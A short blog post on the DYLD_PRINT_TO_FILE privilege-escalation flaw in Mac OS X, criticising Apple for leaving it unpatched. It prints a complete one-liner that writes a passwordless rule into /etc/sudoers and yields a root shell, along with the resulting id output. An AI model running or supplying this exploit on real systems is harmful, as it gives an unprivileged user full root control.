Several weeks ago, a vulnerability in Apple’s logging implementation was discovered by Stefan Esser (known for the jailbreaks of your IOS devices). To this day, the vulnerability remains unpatched.
It’s trivially simple to get a root account, once you have a normal system account on a Mac OSX system.
By default, sudo is protected by your account password.
$ sudo su - Password:
However, if you abuse the DYLD_PRINT_TO_FILE vulnerability, you instantly get root.
$ id uid=1390866408(mattias) $ DYLD_PRINT_TO_FILE=/etc/sudoers newgrp <<< 'echo "$USER ALL=(ALL) NOPASSWD:ALL" >&3'; sudo -s $ id uid=0(root) gid=0(wheel)
A single one-liner that elevates your privileges and bypasses sudo altogether.
It’s one thing that this happened. It’s software, we expect bugs. It’s quite another that this problem still isn’t patched after weeks of the exploit being known in the wild.